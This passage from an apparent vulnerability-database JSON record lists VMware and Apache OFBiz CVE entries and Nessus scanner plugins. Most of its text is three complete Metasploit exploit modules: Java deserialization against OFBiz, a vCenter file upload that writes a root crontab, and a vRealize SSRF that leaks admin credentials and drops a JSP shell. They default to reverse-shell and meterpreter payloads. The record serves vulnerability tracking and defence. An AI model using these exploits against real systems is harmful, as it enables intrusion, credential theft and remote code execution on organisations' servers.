"cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.0.1.1"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:21:53", "description": "The vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T12:15:00", "type": "cve", "title": "CVE-2021-22005", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-30T22:36:00", "cpe": ["cpe:/a:vmware:vcenter_server:6.5", "cpe:/a:vmware:vcenter_server:6.7", "cpe:/a:vmware:vcenter_server:7.0"], "id": "CVE-2021-22005", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22005", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vcenter_server:7.0:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.7:-:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2023-05-27T14:46:54", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-07T00:00:00", "type": "zdt", "title": "Apache OFBiz SOAP Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-07T00:00:00", "id": "1337DAY-ID-36080", "href": "https://0day.today/exploit/description/36080", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n XML_NS = {\n 'serResponse' => 'http://ofbiz.apache.org/service/',\n 'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'\n }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache OFBiz SOAP Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for\n versions prior to 17.12.06.\n },\n 'Author' => [\n 'yumusb', # original PoC\n 'Spencer McIntyre', # metasploit module\n 'wvu' # metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-26295' ],\n [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],\n [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ]\n ],\n 'DisclosureDate' => '2021-03-22', # NVD publish date\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_soap('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n messages = {}\n res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|\n key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s\n messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s\n end\n\n if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')\n return CheckCode::Vulnerable('Target can deserialize arbitrary data.')\n end\n\n CheckCode::Safe('Target cannot deserialize arbitrary data.')\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_soap(\n # framework/webapp/lib/rome-0.9.jar\n generate_java_deserialization_for_command('ROME', 'bash', cmd)\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def send_request_soap(data)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),\n 'ctype' => 'text/xml',\n 'data' => <<~XML\n <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <soapenv:Header/>\n <soapenv:Body>\n <ser>\n <map-HashMap>\n <map-Entry>\n <map-Key>\n <cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>\n </map-Key>\n <map-Value>\n <std-String value=\"http://#{Faker::Internet.domain_name}\"/>\n </map-Value>\n </map-Entry>\n </map-HashMap>\n </ser>\n </soapenv:Body>\n </soapenv:Envelope>\n XML\n )\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36080", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:10", "description": "This Metasploit module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "zdt", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "1337DAY-ID-36874", "href": "https://0day.today/exploit/description/36874", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36874", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:49", "description": "This Metasploit module exploits a pre-auth server-side request forgery (CVE-2021-21975) and post-auth file write (CVE-2021-21983) in VMware vRealize Operations Manager to leak admin creds and write/execute a JSP payload. CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate endpoint. Code execution occurs as the \"admin\" Unix user.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "zdt", "title": "VMware vRealize Operations Manager Server-Side Request Forgery / Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-27T00:00:00", "id": "1337DAY-ID-36160", "href": "https://0day.today/exploit/description/36160", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vRealize Operations (vROps) Manager SSRF RCE',\n 'Description' => %q{\n This module exploits a pre-auth SSRF (CVE-2021-21975) and post-auth\n file write (CVE-2021-21983) in VMware vRealize Operations Manager to\n leak admin creds and write/execute a JSP payload.\n\n CVE-2021-21975 affects the /casa/nodes/thumbprints endpoint, and\n CVE-2021-21983 affects the /casa/private/config/slice/ha/certificate\n endpoint. Code execution occurs as the \"admin\" Unix user.\n\n The following vRealize Operations Manager versions are vulnerable:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n * 8.3.0\n\n Version 8.3.0 is not exploitable for creds and is therefore not\n supported by this module. Tested against 8.0.1.\n },\n 'Author' => [\n 'Egor Dimitrenko', # Discovery\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-21975'], # SSRF\n ['CVE', '2021-21983'], # File write\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0004.html'],\n ['URL', 'https://twitter.com/ptswarm/status/1376961747232382976'],\n ['URL', 'https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-03-30', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false,\n 'Targets' => [\n ['vRealize Operations Manager < 8.3.0', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SRVPORT' => 8443,\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n IOC_IN_LOGS, # /usr/lib/vmware-casa/casa-webapp/logs\n ARTIFACTS_ON_DISK # /usr/lib/vmware-casa/casa-webapp/webapps/casa\n ]\n },\n 'Stance' => Stance::Aggressive\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def setup\n super\n\n @creds = nil\n\n print_status('Starting SSRF server...')\n start_service\n end\n\n def check\n leak_admin_creds ? CheckCode::Vulnerable : CheckCode::Safe\n end\n\n def exploit\n return unless (@creds ||= leak_admin_creds)\n\n write_jsp_payload\n execute_jsp_payload\n end\n\n def leak_admin_creds\n # \"Comment out\" trailing path using URI fragment syntax, ostensibly\n ssrf_uri = \"#{srvhost_addr}:#{srvport}#{get_resource}#\"\n\n print_status('Leaking admin creds via SSRF...')\n vprint_status(ssrf_uri)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/nodes/thumbprints'),\n 'ctype' => 'application/json',\n 'data' => [ssrf_uri].to_json\n )\n\n unless res&.code == 200 && res.get_json_document.dig(0, 'address') == ssrf_uri\n print_error('Failed to send SSRF request')\n return\n end\n\n unless @creds\n print_error('Failed to leak admin creds')\n return\n end\n\n print_good('Successfully leaked admin creds')\n vprint_status(\"Authorization: #{@creds}\")\n\n @creds\n end\n\n def on_request_uri(cli, request)\n print_status(\"#{cli.peerhost} connected to SSRF server!\")\n vprint_line(request.to_s)\n\n @creds ||= request.headers['Authorization']\n ensure\n send_not_found(cli)\n close_client(cli)\n end\n\n def write_jsp_payload\n jsp_path = \"/usr/lib/vmware-casa/casa-webapp/webapps/casa/#{jsp_filename}\"\n\n print_status('Writing JSP payload')\n vprint_status(jsp_path)\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n \"../../../../..#{jsp_path}\",\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n 'form-data; name=\"name\"'\n )\n multipart_form.add_part(\n payload.encoded,\n nil, # Content-Type\n nil, # Content-Transfer-Encoding\n %(form-data; name=\"file\"; filename=\"#{jsp_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/casa/private/config/slice/ha/certificate'),\n 'authorization' => @creds,\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res&.code == 200\n fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')\n end\n\n register_file_for_cleanup(jsp_path)\n\n print_good('Successfully wrote JSP payload')\n end\n\n def execute_jsp_payload\n jsp_uri = normalize_uri(target_uri.path, 'casa', jsp_filename)\n\n print_status('Executing JSP payload')\n vprint_status(full_uri(jsp_uri))\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri,\n 'authorization' => @creds\n )\n\n unless res&.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')\n end\n\n print_good('Successfully executed JSP payload')\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..16)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36160", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}], "nessus": [{"lastseen": "2023-06-01T14:24:17", "description": "A remote code execution vulnerability exists in Apache OFBiz prior to 17.12.06 due to Deserialization of Untrusted Data.\nAn unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands on the target system.", "cvss3": {}, "published": "2021-03-30T00:00:00", "type": "nessus", "title": "Apache OFBiz Remote Code Execution (CVE-2021-26295)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:apache:ofbiz"], "id": "APACHE_OFBIZ_CVE-2021-26295.NBIN", "href": "https://www.tenable.com/plugins/nessus/148239", "sourceData": "Binary data apache_ofbiz_cve-2021-26295.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:21:15", "description": "An arbitrary file upload vulnerability exists in vCenter Server. An unauthenticated, remote attacker with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file.", "cvss3": {}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "VMware vCenter Server Arbitrary File Upload (VMSA-2021-0020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-22005.NBIN", "href": "https://www.tenable.com/plugins/nessus/153889", "sourceData": "Binary data vmware_vcenter_cve-2021-22005.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:25:45", "description": "The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to 7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or 8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)", "cvss3": {}, "published": "2021-03-31T00:00:00", "type": "nessus", "title": "VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:vmware:vrealize_operations"], "id": "VMWARE_VREALIZE_OPERATIONS_MANAGER_VMSA-2021-004.NASL", "href": "https://www.tenable.com/plugins/nessus/148255", "sourceData": "# (C) Tenable Network Security, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(148255);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2021-21975\", \"CVE-2021-21983\");\n script_xref(name:\"VMSA\", value:\"2021-0004\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/01\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0019\");\n\n script_name(english:\"VMware vRealize Operations Manager 7.5.x / 8.x Multiple Vulnerabilities (VMSA-2021-0004)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"VMware vRealize Operations running on the remote host is affected by a Server Side\nRequest Forgery and Arbitrary File Write vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vRealize Operations (vROps) Manager running on the remote web server is 7.5.x prior to\n7.5.0.17771878, 8.0.0 prior to 8.0.1.17771851, or 8.1.0 prior to 8.1.1.17772462 or 8.2.0 prior to 8.2.0.17771778 or\n8.3.0 prior to 8.3.0.17787340. It is, therefore, affected by a multiple vulnerablities. \n\n - A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side\n request Forgery attack to steal administrative credentials. (CVE-2021-21975)\n\n - An authenticated malicious actor with network access to the vRealize Operations Manager API can write\n files to arbitrary locations on the underlying photon operating system.(CVE-2021-21983)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2021-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vRealize Operations Manager version\n7.5.0.17771878, 8.0.1.17771851, 8.1.1.17772462, 8.2.0.17771778, 8.3.0.17787340 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21983\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-21975\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'VMware vRealize Operations (vROps) Manager SSRF RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/31\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vrealize_operations\");\n script_end_attributes();\n\n 